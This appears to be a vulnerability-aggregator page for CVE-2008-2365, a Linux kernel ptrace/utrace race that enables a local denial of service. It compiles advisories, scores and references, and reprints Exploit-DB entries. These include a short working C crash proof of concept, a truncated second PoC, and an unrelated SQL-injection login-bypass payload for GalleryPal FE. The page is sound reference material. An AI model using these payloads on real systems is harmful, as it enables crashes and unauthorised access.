CVE-2008-2365
published 2008-06-30CVE-2008-2365: Race condition in the ptrace and utrace support in the Linux kernel 2.6.9 through 2.6.25, as used in Red Hat Enterprise Linux (RHEL) 4, allows local users to…
PriorityP416medium4.7CVSS 2.0
AVLACMAuNCNINAC
EXPLOIT
EPSS
0.53%
40.5th percentile
Race condition in the ptrace and utrace support in the Linux kernel 2.6.9 through 2.6.25, as used in Red Hat Enterprise Linux (RHEL) 4, allows local users to cause a denial of service (oops) via a long series of PTRACE_ATTACH ptrace calls to another user's process that trigger a conflict between utrace_detach and report_quiescent, related to "late ptrace_may_attach() check" and "race around &dead_engine_ops setting," a different vulnerability than CVE-2007-0771 and CVE-2008-1514. NOTE: this issue might only affect kernel versions before 2.6.16.x.
Affected
126 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| fedoraproject | fedora_core | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
CVSS provenance
nvdv2.04.7MEDIUMAV:L/AC:M/Au:N/C:N/I:N/A:C
vendor_ubuntu7.1HIGH
vendor_redhat4.9MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Ubuntu
Linux kernel vulnerabilities
vendor_ubuntu·2008-07-15·CVSS 7.1
CVE-2008-2826 [HIGH] Linux kernel vulnerabilities
Title: Linux kernel vulnerabilities
Summary: Linux kernel vulnerabilities
Dirk Nehring discovered that the IPsec protocol stack did not correctly
handle fragmented ESP packets. A remote attacker could exploit this to
crash the system, leading to a denial of service. (CVE-2007-6282)
Johannes Bauer discovered that the 64bit kernel did not correctly handle
hrtimer updates. A local attacker could request a large expiration value
and cause the system to hang, leading to a denial of service.
(CVE-2007-6712)
Tavis Ormandy discovered that the ia32 emulation under 64bit kernels did
not fully clear uninitialized data. A local attacker could read private
kernel memory, leading to a loss of privacy. (CVE-2008-0598)
Jan Kratochvil discovered that PTRACE did not correctly handle certain
calls when
Red Hat
kernel: ptrace: Crash on PTRACE_{ATTACH,DETACH} race
vendor_redhat·2008-04-02·CVSS 4.9
CVE-2008-2365 [MEDIUM] kernel: ptrace: Crash on PTRACE_{ATTACH,DETACH} race
kernel: ptrace: Crash on PTRACE_{ATTACH,DETACH} race
Race condition in the ptrace and utrace support in the Linux kernel 2.6.9 through 2.6.25, as used in Red Hat Enterprise Linux (RHEL) 4, allows local users to cause a denial of service (oops) via a long series of PTRACE_ATTACH ptrace calls to another user's process that trigger a conflict between utrace_detach and report_quiescent, related to "late ptrace_may_attach() check" and "race around &dead_engine_ops setting," a different vulnerability than CVE-2007-0771 and CVE-2008-1514. NOTE: this issue might only affect kernel versions before 2.6.16.x.
Red Hat
crash - mmput()/unmap_vmas() - gdb testsuite
vendor_redhat·2006-09-18·CVSS 4.7
CVE-2008-2944 [MEDIUM] crash - mmput()/unmap_vmas() - gdb testsuite
crash - mmput()/unmap_vmas() - gdb testsuite
Double free vulnerability in the utrace support in the Linux kernel, probably 2.6.18, in Red Hat Enterprise Linux (RHEL) 5 and Fedora Core 6 (FC6) allows local users to cause a denial of service (oops), as demonstrated by a crash when running the GNU GDB testsuite, a different vulnerability than CVE-2008-2365.
GHSA
GHSA-hqv4-9647-qxr5: Double free vulnerability in the utrace support in the Linux kernel, probably 2
ghsa_unreviewed·2022-05-01·CVSS 4.7
CVE-2008-2944 [MEDIUM] CWE-415 GHSA-hqv4-9647-qxr5: Double free vulnerability in the utrace support in the Linux kernel, probably 2
Double free vulnerability in the utrace support in the Linux kernel, probably 2.6.18, in Red Hat Enterprise Linux (RHEL) 5 and Fedora Core 6 (FC6) allows local users to cause a denial of service (oops), as demonstrated by a crash when running the GNU GDB testsuite, a different vulnerability than CVE-2008-2365.
GHSA
GHSA-rv47-5vwq-v454: Race condition in the ptrace and utrace support in the Linux kernel 2
ghsa_unreviewed·2022-05-01·CVSS 4.9
CVE-2008-2365 [MEDIUM] CWE-362 GHSA-rv47-5vwq-v454: Race condition in the ptrace and utrace support in the Linux kernel 2
Race condition in the ptrace and utrace support in the Linux kernel 2.6.9 through 2.6.25, as used in Red Hat Enterprise Linux (RHEL) 4, allows local users to cause a denial of service (oops) via a long series of PTRACE_ATTACH ptrace calls to another user's process that trigger a conflict between utrace_detach and report_quiescent, related to "late ptrace_may_attach() check" and "race around &dead_engine_ops setting," a different vulnerability than CVE-2007-0771 and CVE-2008-1514. NOTE: this issue might only affect kernel versions before 2.6.16.x.
No detection rules found.
Exploit-DB
GalleryPal FE 1.5 - Authentication Bypass
exploitdb·2009-12-15
CVE-2009-2365 GalleryPal FE 1.5 - Authentication Bypass
GalleryPal FE 1.5 - Authentication Bypass
---
[~] GalleryPal FE v1.5(Auth Bypass)
[~]TYPE:Remote SQL Injection Vulnerability
[~] ----------------------------------------------------------
[~] author: R3d-D3v!L
[~]
[~] Date: 15.11.2008
[~]
[~] Home: www.ahacker.net
[~]
[~] contact: N/A
[~]
[~] -----------------------------------------------------------
ALERT FR0M THE DARKNESS BY 7h3 REd-D3v!L
[~] Exploit:
[*] username : admin
[*] password : X' or ' 1=1--
[*] demo:
[*] server/GalleryPal_FE_Demo/login.asp
[~] spechial thanks : ((dolly)) & ((7am3m)) & ((magoush_1987)) & (DEV!L_MODE) & ((0R45hy)) & {0}-{n-c-A}-{0}
[~]
[?] 4.!.S ---> ((R3d D?v!L))--JuPA--M2Z --d3v!L-Ro07
[~]
[~] www.xp10.me
[~]
[~]I4M:4r48!4N-3XPLO!73r
Exploit-DB
Linux Kernel 2.6.9 < 2.6.25 (RHEL 4) - utrace and ptrace Local Denial of Service (1)
exploitdb·2008-06-25
CVE-2008-2365 Linux Kernel 2.6.9 < 2.6.25 (RHEL 4) - utrace and ptrace Local Denial of Service (1)
Linux Kernel 2.6.9
#include
int main(int argc, char *argv[])
{
pid_t pid = atoi(argv[1]);
while (1)
ptrace(PTRACE_ATTACH, pid, NULL, NULL);
return 0;
}
Exploit-DB
Linux Kernel 2.6.9 < 2.6.25 (RHEL 4) - utrace and ptrace Local Denial of Service (2)
exploitdb·2008-06-25
CVE-2008-2365 Linux Kernel 2.6.9 < 2.6.25 (RHEL 4) - utrace and ptrace Local Denial of Service (2)
Linux Kernel 2.6.9
#ifdef __ia64__
#undef ia64_fpreg
#undef pt_all_user_regs
#endif /* __ia64__ */
#include
#include
#include
#if defined __i386__ || defined __x86_64__
#include
#endif
#include
#include
#include
#include
#include
#include
/* WARNING: The real testing count is probably unbound. */
#define DEFAULT_TESTTIME 10 /* seconds */
static pid_t pid;
static void
cleanup (void)
{
if (pid != 0)
kill (pid, SIGKILL);
}
static void
handler_fail (int signo)
{
cleanup ();
signal (signo, SIG_DFL);
raise (signo);
}
static void *thread_func(void *argv0_pointer)
{
execl("/proc/self/exe", argv0_pointer, "child", NULL);
abort ();
/* NOTREACHED */
}
int main(int argc, const char *argv[])
{
char *testtime = getenv ("TESTTIME");
time_t testend = time (NULL) + (testtime != NULL ? atoi
(testtim
http://git.kernel.org/?p=linux/kernel/git/stable/linux-2.6.25.y.git%3Ba=commit%3Bh=5ecfbae093f0c37311e89b29bfc0c9d586eace87http://git.kernel.org/?p=linux/kernel/git/stable/linux-2.6.25.y.git%3Ba=commit%3Bh=f358166a9405e4f1d8e50d8f415c26d95505b6dehttp://git.kernel.org/?p=linux/kernel/git/stable/linux-2.6.25.y.git%3Ba=commit%3Bh=f5b40e363ad6041a96e3da32281d8faa191597b9http://marc.info/?l=linux-kernel&m=117863520707703&w=2http://rhn.redhat.com/errata/RHSA-2008-0508.htmlhttp://secunia.com/advisories/30850http://secunia.com/advisories/31107http://securityreason.com/securityalert/3965http://sources.redhat.com/cgi-bin/cvsweb.cgi/~checkout~/tests/ptrace-tests/tests/late-ptrace-may-attach-check.c?cvsroot=systemtaphttp://www.openwall.com/lists/oss-security/2008/06/26/1http://www.openwall.com/lists/oss-security/2008/07/14/1http://www.securityfocus.com/bid/29945http://www.securitytracker.com/id?1020362http://www.ubuntu.com/usn/usn-625-1https://bugzilla.redhat.com/show_bug.cgi?id=449359https://exchange.xforce.ibmcloud.com/vulnerabilities/43567https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10749http://git.kernel.org/?p=linux/kernel/git/stable/linux-2.6.25.y.git%3Ba=commit%3Bh=5ecfbae093f0c37311e89b29bfc0c9d586eace87http://git.kernel.org/?p=linux/kernel/git/stable/linux-2.6.25.y.git%3Ba=commit%3Bh=f358166a9405e4f1d8e50d8f415c26d95505b6dehttp://git.kernel.org/?p=linux/kernel/git/stable/linux-2.6.25.y.git%3Ba=commit%3Bh=f5b40e363ad6041a96e3da32281d8faa191597b9http://marc.info/?l=linux-kernel&m=117863520707703&w=2http://rhn.redhat.com/errata/RHSA-2008-0508.htmlhttp://secunia.com/advisories/30850http://secunia.com/advisories/31107http://securityreason.com/securityalert/3965http://sources.redhat.com/cgi-bin/cvsweb.cgi/~checkout~/tests/ptrace-tests/tests/late-ptrace-may-attach-check.c?cvsroot=systemtaphttp://www.openwall.com/lists/oss-security/2008/06/26/1http://www.openwall.com/lists/oss-security/2008/07/14/1http://www.securityfocus.com/bid/29945http://www.securitytracker.com/id?1020362http://www.ubuntu.com/usn/usn-625-1https://bugzilla.redhat.com/show_bug.cgi?id=449359https://exchange.xforce.ibmcloud.com/vulnerabilities/43567https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10749
2008-06-30
Published